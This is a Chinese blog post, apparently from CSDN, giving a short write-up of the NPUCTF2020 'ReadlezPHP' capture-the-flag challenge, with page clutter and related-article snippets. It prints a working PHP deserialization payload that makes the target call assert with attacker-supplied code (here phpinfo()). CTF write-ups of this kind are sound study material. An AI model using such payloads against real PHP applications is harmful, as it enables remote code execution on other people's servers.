[NPUCTF2020]ReadlezPHP wp

☆firefly☆

已于 2025-03-17 20:08:35 修改

阅读量379

点赞数 6

文章标签： web安全网络安全

于 2025-03-17 20:06:11 首次发布

本文链接：https://blog.youkuaiyun.com/2303_80867263/article/details/146324406

版权

知识点:反序列化

发现点不了右键,那就用ctel+u看看源代码

发现一个可疑文件/time.php?source

发现是一个很明显的反序列化(反序列化过程不会调用类的 __construct()函数)

变量b是函数,a是值,那么b可以为system,assert这些,但这里不能用eval,因为

eval()里的引号必须是双引号,而assert()可以将整个字符串参数当作php参数执行,以及不能以变量函数的形式调用eval

我构造了一个$b=system,$a=ls / 的失败了,可能是过滤了吧,那就用phpinfo看看禁用了哪些,

class HelloPhp {

    public $a = 'phpinfo()';

    public $b = 'assert';

}

$a = new HelloPhp();

echo serialize($a);

Payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

然后在里面看

之后还是没找到flag,看了下大佬的wp,原来就在phpinfo里面

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

☆firefly☆

关注关注

6
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[NPUCTF2020]认清形势，建立信心-WP

luoluopeach

09-10

721

题目： from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e,

[NPUCTF2020]EzRSA

2er0!=O的博客

07-25

694

[NPUCTF2020]EzRSA 附件： from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla

参与评论您还未登录，请先登录后发表或查看评论

NPUCTF2020]ReadlezPHP

Hopeace的博客

10-20

2913

[NPUCTF2020]ReadlezPHP0x01 浏览题目0x02 分析题目php @0x03 复现0x04 补充作者：Hopeace 靶机地址：https://buuoj.cn/challenges#[NPUCTF2020]ReadlezPHP 0x01 浏览题目主页和源代码都没有什么有用的信息抓包试试response里有木有东西 http://www.nwpu.edu.cn 西工大的宣传页面，对此题属于无用信息扫目录，没有结果再仔细看一遍源代码 ctrl + f 搜索.php看有没有泄露的

[NPUCTF2020]ReadlezPHP

Yb_140的博客

10-23

496

简单反序列化，认识新函数assert

--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault

Zero_Adam的博客

03-27

881

目录：一、自己做：二、不足：三、学习WP：新知识！！！string.strip_tags 一、自己做： 0入门，，连接：https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足：看到刚开始的提示就蒙了，没有想到传参这么简单看到了include，文件包含的漏洞，第一时间没有想到用php的伪协议去读取文件，，，除了filter等等，zip也可以上传木马的呀，这个别忘了，，，三、学习WP：看到这个，像md5拓展攻击，然后抓包看一下，一看，

2020年WP新手建站视频教程.txt

06-17

本套课程是一套2020年全新版的wordpress建站视频教程，我们将全方位解说如何通过wordpress来建站自己的网站，我们会介绍如何购买域名和网站空间、如何搭建网站空间、如何安装wordpress程序、如何做好SEO优化等方面，...

ECE_TRANS_WP.29_2020_79_E.pdf

04-25

WP29在2020年提交了一份新的联合国法规提案，关于车辆网络安全以及网络安全管理体系的统一规定，这一提案主要由自动化/无人驾驶和联网车辆工作组提交。提案针对的是智能网联汽车的网络安全问题，提出了一个全新的...

mysql inner join 和join_mysql中的7种联表join

weixin_39703773的博客

12-01

162

建表在这里呢我们先来建立两张有外键关联的张表。CREATE DATABASE db0206;USE db0206;CREATE TABLE `db0206`.`tbl_dept`( `id` INT(11) NOT NULL AUTO_INCREMENT, `deptName` VARCHAR(30), `locAdd` VARCHAR(40), PRIMARY KEY (`id...

羊城杯2020 wp

最新发布

08-18

羊城杯2020是一场年度的电子竞技赛事，为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手，他们在各个游戏项目中展现了高水平的操作和战术。在比赛的文化氛围方面，羊城杯2020鼓励团队协作和竞争精神，这对于参赛选手来说是一个很好的机会展现自己的技术能力和团队合作能力。此外，组委会还积极倡导公平竞赛，严禁使用任何形式的作弊或不正当手段来获取胜利，从而保证了比赛的公正性。羊城杯2020不仅是一场竞技比赛，还提供了丰厚的奖金和荣誉，吸引了众多顶尖选手参与其中。参赛选手们通过紧张刺激的比赛，展现了他们的技术实力和战术策略。同时，比赛也为电竞爱好者们提供了一个观赏比赛和学习经验的机会，让他们更好地了解电竞运动，提高自己的技术水平。此外，羊城杯2020还注重了普及电竞文化的意义。比赛在各个媒体平台上进行直播，使更多的观众能够通过网络或电视观看比赛，增加了电竞的曝光度。通过各种推广活动，羊城杯2020吸引了更多非电竞爱好者的关注，提高了电竞在社会中的认可度和影响力。总的来说，羊城杯2020是一场令人期待的电竞盛事，它不仅展示了顶尖选手们的实力和技巧，也推广了电竞文化并吸引了更多人的关注。这样的比赛将继续推动电竞行业的发展和壮大，为电竞爱好者们带来更多的精彩赛事和娱乐体验。